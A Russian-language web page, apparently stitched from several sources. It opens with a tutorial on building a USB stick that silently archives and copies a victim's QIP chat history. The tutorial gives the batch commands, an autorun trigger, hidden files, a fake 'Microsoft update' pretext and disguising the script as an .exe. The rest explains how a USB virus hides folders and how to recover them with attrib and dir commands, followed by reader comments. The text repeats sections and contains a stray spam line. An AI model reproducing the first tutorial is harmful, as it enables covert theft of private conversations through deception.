Скрытое копирование с флешки на компьютер bat
Обновлено: 15.05.2024
Батник - это обычный текстовый файл, содержащий наборы команд интерпретатора и имеющий расширение .bat или .cmd! (.cmd работают только в ОС семейства NT). Редактировать такие файлы можно при помощи блокнота "Или любого другого текстового редактора.
Пишем батник
Создавать,батник будем для второй ситуации (она немного сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:
chdir C:\Program Files\QIP\Users
f:\rar.exe a -r users -r > nul
copy users.rar g:\adc > nul
del users.rar > nul
риэлторы в нижнем новгороде там;риэлторы в нижнем новгороде там
где
©Echo off - скрывает визуальный процесс копирования.
C:\Program Files\QIP\Users - папка, в которой находится история.
f:\rar.exe а -г users > nul -запуск архиватора для ускорения копирования.
copy users.rar g:\adc > nul - адрес куда копируем.
del users.rar > nul - удаляет созданный архив на жеском диске.
Не всегда бывает известна буква флеш-диска. В "таком случае прописываем несколько вариантов (один уж точно угадаем):
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расширение c .txt нa .bat. Это можно сделать в Total Commander'e.
Создаем автозапуск
Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:
Сохраняем файл и переименовываем его на autorun.inf.
Делаем архив
Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.
Из папки с WinRAR (по умолчанию C:\Program Files\WinRAR берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.
Социальная инженерия
Не обязательно делать автозапуск. "Жертва" сама может запустить батник. Для этого надо воспользоваться социальной инженерией. Например, сообщаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстродействие и безопасность операционной системы. Устанавливать обновление нужно только с флешки. Можете сами придумать причину, по которой надо запустить наш батник. Всё зависит от вашей фантазии и смекалки.
Превращаем .bat в .exe
Для большей "безопасности" neperoним .bat в .ехе (вдруг"жертва" знакома с написанием батников). В этом нам поможет небольшая программка ExeScript v3.0.
Теперь укажем для нашего ехе-шника подходящую иконку. В окне Properties щёлкаем на поле Custom Icon и выбираем заранееприготовленную иконку. Далее нажимаем F7 или Project > Build . Всё, ехе-шник готов.
Несколько лет не встречал вирус, который скрывает файлы и папки на флешке (предаю привет библиотеке КГТУ им. Некрасова). В двух словах о том, что делает этот вирус:
- вирус скрывает все файлы и папки на флешке от пользователя присваивая им атрибут скрытый и системный. Все дело в том, что Windows, по умолчанию, не отображает файлы с такими атрибутами и пользователь их просто не видит.
- вирус создает ярлыки вместо ваших файлов и папок, при нажатии на которые происходит запуск вируса. Снова спасибо Microsoft, расширения файлов, по умолчанию, не отображаются.
- в корзине, на флешке создается копия вируса, это может быть, например, RECYCLER\f4448e25.exe
- так же создается файл автозапуска флешки autorun.inf, до недавних пор очень активно использовался на CD (DVD) и мигрировал на флешки. Удобная штука была, вставил CD и сразу же запускается программа установки драйверов или игры. Разработчики вирусов нашли файлу autorun.inf другое применение - запуск вируса)
Что видит пользователь? Пользователи ничего не замечает, он запускает ярлыки, которые запускают вирус, а потом открывают нужный файл или папку. Но, если флешку вставить в компьютер, на котором установлен простой антивирус, то антивирус удалит все ярлыки, файл автозапуска и файл вируса из корзины. Пользователь, в этом случае, увидит пустую флешку и будет "бить себя ушами по щекам".
Но, на самом деле ничего страшного не произошло, нужно всего-то еще раз проверить флешку на вирусы (рекомендую ESET) и отобразить скрытые и системные файлы. Я бы порекомендовал два способа (самых простых, не будем "распыляться"):
Способ 1. Для тех, кто хоть как-то знаком с командной строкой:
- Пуск -> Выполнить -> cmd
- Перейдите на флешку (USB) набрав в командной строке имя диска, например e:
- Выполните команду, которая снимет атрибуты "скрытый" и "системный" с ваших папок (фалов) и покажет скрытые файлы attrib -S -H /S /D Подождите, пока команда закончит выполняться.
Способ 2. Для ленивых:
- Скачайте файл showFiles.bat
- Скопируйте его на флешку (USB).
- Запустите файл showFiles.bat
- Нужно немного подождать, все зависит от объема флешки, может и 10 минут.
Нужно пояснить, как мы показали файлы на флешке, которые скрыл вирус:
- Команда ATTRIB применяется для отображения и изменения атрибутов файлов и каталогов из командной строки Windows
- -S - снимает атрибут "Системный", в случае с +S - устанавливает атрибут
- -H - снимает атрибут "Скрытый", если сделать +H - установит атрибут.
- /S - Обработка файлов с указанными именами в текущем каталоге и во всех его подкаталогах.
- /D Обработка файлов и каталогов.
- Если вы не указываете в командной строке имен файлов, ATTRIB предполагает *.* и действует на все файлы в текущем каталоге.
В комментариях можете задать вопросы, описать ситуации, которые я не предусмотрел.
Программирование. Продвижение SEO. Работа с CMS. 1С Предприятие.
Недопустимые символы в папке. Или Как вирус прячет папки на флешке.
Вирус на флешке сделал папки скрытыми.
Если место на флешке занято, а папок, как скрытых, так и системных нет. Это говорит о том, что от Вас вся информация на диске скрыта. Скрывает ее вирус, используя папку в имени которой он использует недопустимые символы. Такую папку не видно в Total Commander и Far, про проводник винды вообще молчу.
В этом случаи форматировать флешку не стоит .
В данном случаи решить проблему нам поможет командная строка: CMD.
Все дело в том, что вирус создает директорию в названии которой есть недопустимые символы. Этих символов нет в наборе символов, которые используют для назначения имен папок в формате 8.3. В результате, такая папка не отображается ни в одном из файловых менеджеров в независимости от настроек последнего.
Затем вирус переносит настоящие папки в эту скрытую папку.
Я попытаюсь описать по шагам, как вынуть файлы из скрытой папки на флешке, которой якобы нет.
Итак, начнем.
Наша флека/диск это диск с буквой I:\
Если поглядеть на картинку то ни каких папок нет. Как тут ни крути =)
Чтобы нам увидеть директорию, обратимся за помощью к командной строке.
Жмем WIN+R вбиваем команду CMD и жмем Enter.
Перед нами приглашение командной строки.
На картинке видно скрытую папку с названием e2e2
Ну вот когда мы знаем название можно на прямую обратиться к ней в менеджере файлов.
Я для простоты использовал Total Commander, просто вбиваете Х:\e2e2
1 в строку и жмете Enter. Затем переносите Ваши файлы на диск С:\, а флешку форматируете.
Советы пользователей присланных мне.
Совет 1: Меняем имя папки
Прислал его один из пользователей.
В командной строке набираем
ren g:\e2e2
1 111
И переименовываем папку e2e2
1 на флешке в 111 с помощью командной строки (win+r, cmd)
Совет 2: Бат файл для скрытых папок
Также если у Вас на флешке есть скрытые папки то вам поможет БАТ файл который был предложен одним из пользователей.
@echo off
mode con codepage select=1251 > nul
echo Please wait…
attrib -s -h -r -a /s /d
Данный файл снимает все атрибуты со всех папок и файлов, ЗАПУСКАТЬ ТОЛЬКО НА ФЛЕШЬ ДИСКЕ .
Внимание 20-03-2011 был добавлен комментарий о том, что уже существует новая модификация вируса, которая не прячет папки, а удаляет их, будте бдительней.
Совет 3: Простой способ вынимания информации
Пользователем СЕРГЕЙ был прислан самый простой способ решение задачи.
Он открыл флешку в Total Commander 7.0 Podarok Edition как оказалось там есть кнопка 8.3 (Короткие имена в формате DOS 8.3) нажав её имена папок отображаемых изменились и появилась нужная папка е2е2
1 войдя в которую всё ее содержимое можно скопировать в другое место, или можно её переименовать в 111 и она становится видна.
Совет 4: Способ пользователя Muller
Пользователем Muller был предложен оригинальный способ. Для этого нужно запаковать флешку архиватором RAR. Затем открыть архив и вынуть нужные вам файлы =) вот ссылка на комментарий Muller`а.
Совет 5: Способ похожий на 4-й c WIN RAR, но проще. Прислан пользователем Димка
Хочу предложить усовершенствованный метод открытия папок с помощью WinRaRа. Запускаем архиватор Пуск>Все программы>WinRaR. Открываем нашу флешку и вуаля, все папки видны, перетаскиваем папки из окна WinRaR в другое место на жестком диске, форматируем флешку.
Вот ссылка на комментарий Димки.
Совет 6: Решение проблемы с проводником Windows, когда невозможно снять с папки атрибут (галочку) крытый
Совет 7: Просмотр флешки через FTP клиент.
Оригинальное решение предложил mops. Каким именно клиентом он просматривал флешку он не уточнил. Но как вариант возьмем на заметку.
С уважением, Acid.
1 882 Комментариев “ Вирус на флешке сделал папки скрытыми. ”
помог с установкой тотал командр подарок эдишн
все крайне просто
Благодарю за информацию
Способ с архивом очень помог. Спасибо.
мне помогло через WinRAR. Всем советую!
Спасибо за совет.
Спасибо огромное, открыл способом №2 респект и уважуха
2 Способ моментально работает! Спасибо!
Спасибо! Мгновенно открыла БАТ файлом
Спасибо огромное, ваша статья очень помогла.
Спасибо 100% помогает 6-й метод
Спасибо ребят!) Второй способ помог)
Благодарю. Совет №5 помог. Димки
Проблема в том, что в этих ярлыках записано по две команды, первая запуск и установка вируса в ПК, вторая открытие Вашей драгоценной папки.
Нашла скрытые файлы EasyRecovery, вперемешку правда, но НАШЛА!
Большое вам спасибо!
Именно ваш способ помог!
попробуйте переименовать
В командной строке набирать
ren h:\folder ..
Пишет что, не найдется найти указанный файл.
у меня написано файл не найден .Ничего не показывает. Что в этом случае сделать помогите пожалуйста
Попробуйте в командной строке посмотреть наличие папок в имени которых есть недопустимые символы.
Открыл флешку через RAR, папки отобразились, скидывать в другой диск неудобно, так как на них более 10 гиг инфы-долго, есть другой способ?
Только используя бат файл. Или в командной строке.
проще всего открыть командную строку. ввести X: где Х буква флешки. потом с помощью изменить-вставить вставить следующие данные attrib -s -h -r -a /s /d *.*
Все дело в том, что вирус создает директорию в названии которой есть недопустимые символы. Этих символов нет в наборе символов, которые используют для назначения имен папок в формате 8.3. В результате, такая папка не отображается ни в одном из файловых менеджеров в независимости от настроек последнего.
Затем вирус переносит настоящие папки в эту скрытую папку.
Я попытаюсь описать по шагам, как вынуть файлы из скрытой папки на флешке, которой якобы нет.
————————————
ВНИМАНИЕ: если у вас вместо папок ярлыки или файлы *.exe, то читаем статью «Папки на флешке стали ярлыками«.Это сделано потому что способ решения проблемы разный.
————————————
Итак, начнем.
Наша флека/диск это диск с буквой I:\
Если поглядеть на картинку то ни каких папок нет. Как тут ни крути =)
Чтобы нам увидеть директорию, обратимся за помощью к командной строке.
Жмем WIN+R вбиваем команду CMD и жмем Enter.
Перед нами приглашение командной строки.
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\Documents and Settings\User>_
Далее вводим команду
Dir i:\ /x
где :
i – буква вашей флешки
/х – ключ для показа всех файлов
Ну вот когда мы знаем название можно на прямую обратиться к ней в менеджере файлов.
Я для простоты использовал Total Commander, просто вбиваете в строку и жмете Enter. Затем переносите Ваши файлы на диск С:\, а флешку форматируете.
Советы пользователей присланных мне.
Совет 1: Меняем имя папки
В командной строке набираем
ren g:\e2e2
1 111
И переименовываем папку e2e2
1 на флешке в 111 с помощью командной строки (win+r, cmd)
Совет 2: Бат файл для скрытых папок
Также если у Вас на флешке есть скрытые папки то вам поможет БАТ файл:
@echo off
mode con codepage select=1251 > nul
echo Please wait…
attrib -s -h -r -a /s /d
Данный файл снимает все атрибуты со всех папок и файлов, ЗАПУСКАТЬ ТОЛЬКО НА ФЛЕШЬ ДИСКЕ .
Внимание 20-03-2011 был добавлен комментарий о том, что уже существует новая модификация вируса, которая не прячет папки, а удаляет их, будте бдительней.
Совет 3: Простой способ вынимания информации
Пользователем СЕРГЕЙ был прислан самый простой способ решение задачи.
Он открыл флешку в Total Commander 7.0 Podarok Edition как оказалось там есть кнопка 8.3 (Короткие имена в формате DOS 8.3) нажав её имена папок отображаемых изменились и появилась нужная папка е2е2
1 войдя в которую всё ее содержимое можно скопировать в другое место, или можно её переименовать в 111 и она становится видна.
Совет 4: Способ пользователя Muller
Пользователем Muller был предложен оригинальный способ. Для этого нужно запаковать флешку архиватором RAR. Затем открыть архив и вынуть нужные вам файлы =) вот ссылка на комментарий Muller`а .
Читайте также: